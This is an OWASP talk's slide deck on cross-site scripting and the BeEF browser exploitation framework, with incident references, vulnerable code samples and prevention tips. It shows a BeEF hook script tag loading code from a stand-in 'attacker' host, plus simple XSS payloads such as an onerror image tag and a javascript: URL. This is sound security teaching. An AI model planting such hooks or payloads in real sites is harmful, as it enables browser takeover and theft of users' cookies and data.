Embed Size (px)
Citation preview
Presented to OWASP San Antonio at Denim Group
Introduction to Cross-Site Scripting with BeEF
Created by: Charles Neill
Modified Date: 2/5/2015
What is cross-site scripting?
• Cross-Site Scripting (referred to as XSS) is a type of web application attack where malicious client-side script is injected into the application output and subsequently executed by the user’s browser
• TL;DR: Not filtering out HTML and JavaScript in user input = bad• It can be used to take over a user’s browser in a variety of ways
2
Why should I care about cross-site scripting?
• There was a time not too long ago when XSS was considered a low-risk type of security issue, because when compared to a server-side exploit, it seemed relatively benign
• As other issues like PHP remote file inclusions have become harder to exploit, XSS attacks have increased in prominence and sophistication
Trick question: Which is worse, popping up an alert box or popping root on a server?
3
Who’s affected by cross-site scripting?
Everyone. No, really – almost every site you can think of has had XSS problems at one time or another (and probably still does)
Don’t believe me?• Universal XSS in Internet Explorer (2015) [1]
• Tweetdeck (2014) [2]
• PayPal (2013) – BONUS: discovered by a 17 year old kid [3]
• Google Finance (2013) [4]
• 25 “Verasign-secured” online stores (2012) [5]
• McAfee (2011) [6]
• Visa (2010) [7]
4
5www.rackspace.com
Some sites you might recognize
http://www.xssed.com/files/image/News/paypalevsslxss.PNG
6
Object Placeholder
www.rackspace.com
Some sites you might recognize
http://3.bp.blogspot.com/-IpLMWEVPnRc/UmYV_19hnNI/AAAAAAAADfc/caJdmBEsyaE/s1600/1.png
7
Object Placeholder
Some sites you might recognize
https://isc.sans.edu/diaryimages/youtube.png
Boooooring…
The classic proof-of-concept for XSS is a little alert box with some arbitrary text in it, or a picture of something silly. This doesn’t seem nearly dangerous enough to warrant concern.
What else you got?
8
Introducing: BeEF
What’s BeEF? From their website (beefproject.com):
“BeEF is short for The Browser Exploitation Framework… BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser.”
9
10
• That description sounds scary, but what does it mean?
• Think of BeEF as a one-stop-shop to gain and retain control over a user’s browser, and do whatever you want with it
• This is like Metasploit (metasploit.com) for the browser–You can even use Metasploit’s “browser_autopwn” tests to try to take over the browser
How does one use BeEF? This is all it takes to insert into a page:
<script src=http://attacker/hook.js></script>
Where’s the BeEF?
www.rackspace.com
11
The BeEF Dashboard
www.rackspace.com
• Monitor users by their IP, browser, OS• See logs of their activity• Trick the user into downloading malicious files• Perform network reconnaissance• And much more..
12www.rackspace.com
DEMO TIME!
(Get excited)
So many attacks, so little time
14
•Steal cookies
•Play a sound
•Get user-agent string
•See enabled plugins (e.g. Chrome PDF viewer, Java, etc.)
Basic Client-side Attacks
www.rackspace.com
15
•Man-in-the-browser
•Forge user requests
•Get form values / HTML contents
•Fake notifications (Chrome plugin bar, LastPass login, etc.)
•Tabnabbing
More Advanced Client-Side Attacks
www.rackspace.com
16
•Port scanning
•Network mapping
•Execute local Redis commands
Lateral Movement / Network Exploration
www.rackspace.com
17
• Never trust the user• Never trust the user• Never trust the user• Never trust the user• Never trust the user• Never trust the user• Never trust the user• Never trust the user
So what should I do to prevent XSS?
www.rackspace.com
THANK YOU
RACKSPACE® | 1 FANATICAL PLACE, CITY OF WINDCREST | SAN ANTONIO, TX 78218
US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM
© RACKSPACE LTD. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM
19
• Almost all client-side script injection comes down to the following characters:
< > ( ) { } [ ] " ' ; / \
• There are various ways to take care of these characters, but it is too context-dependent to give a one-size-fits-all answer
• The shortest answer is, make sure you’re only getting characters you expect when a user enters any kind of information - make sure you never display a user-entered string without properly encoding it
• Check out the links at the end of this presentation to learn more
So what should I do to prevent XSS? (No, really)
www.rackspace.com
20
Here’s some sample vulnerable JavaScript. See if you can spot the bad part.
<html>
<script>
var lol = function () {
var a = document.getElementById('a').value;
document.write(a);
}
</script>
<input type="text" name="a" id="a">
<input type="submit" onclick="lol();">
</html>
Examples of XSS in code
www.rackspace.com
21
Hmm, there’s the problem…
<html>
<script>
var lol = function () {
var a = document.getElementById('a').value;
document.write(a); // Too easy
}
</script>
<input type="text" name="a" id="a">
<input type="submit" onclick="lol();">
</html>
Examples of XSS in code
www.rackspace.com
22
Now for something a little more interesting. Remember, you also have to remember the third-party libraries you’re using.
Some innocent-looking jQuery code:
$(location.hash) // Wait, that’s it?
Examples of XSS in code
www.rackspace.com
23
But you’re not only securing the code you write, but all the code you used…
$(location.hash) // WHERE’S THE VULNERABLE PART?!
Well, if we’re using jQuery 1.6.1 and we visit the page
http://app/#<img src=/ onerror=alert(1)>
…this will pop up one of those alert boxes [8].
Examples of XSS in code
www.rackspace.com
24
Here are some examples of how to filter HTML characters in a few simple scenarios in PHP (there should be similar functions in any language; check the links at the end of the PPT)
$int = intval($_GET['a']); // This will never return anything other than an integer
$str = htmlentities($_GET['b']); // This will encode any character for which there is
// an HTML entity equivalent (e.g. > < ")
// This is NOT always enough! [9]
Tips for filtering XSS
www.rackspace.com
25
Pop quiz! What’s wrong with this PHP code:
echo('<a href="' . htmlentities($_GET['var']) . '">link</a>');
Getting around prevention measures
www.rackspace.com
26
Pop quiz! What’s wrong with this PHP code:
echo('<a href="' . htmlentities($_GET['var']) . '">link</a>');
What if we set $_GET['var'] to javascript:alert(/xss/);
Getting around prevention measures
www.rackspace.com
27www.rackspace.com
28
QUESTIONS?
www.rackspace.com
29
• OWASP Links– Guide to Cross-site Scripting - https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
– XSS Prevention Cheat Sheet - https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
– DOM based XSS Prevention Cheat Sheet - https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet
Resources
www.rackspace.com
30
• [1] http://seclists.org/fulldisclosure/2015/Feb/0
• [2] http://techcrunch.com/2014/06/11/tweetdeck-fixes-xss-vulnerability/
• [3] http://threatpost.com/paypal-site-vulnerable-to-xss-attack
• [4] http://miki.it/blog/2013/7/30/xss-in-google-finance/
• [5] http://nakedsecurity.sophos.com/2012/02/28/verisign-xss-holes/
• [6] http://www.scmagazine.com/mcafee-working-to-fix-xss-information-disclosure-flaws/article/199505/
• [7] http://news.softpedia.com/news/XSS-Weakness-Found-on-Visa-USA-Website-157115.shtml
• [8] http://ma.la/jquery_xss/
• [9] http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references
References
www.rackspace.com
THANK YOU
RACKSPACE® | 1 FANATICAL PLACE, CITY OF WINDCREST | SAN ANTONIO, TX 78218
US SALES: 1-800-961-2888 | US SUPPORT: 1-800-961-4454 | WWW.RACKSPACE.COM
© RACKSPACE LTD. | RACKSPACE® AND FANATICAL SUPPORT® ARE SERVICE MARKS OF RACKSPACE US, INC. REGISTERED IN THE UNITED STATES AND OTHER COUNTRIES. | WWW.RACKSPACE.COM
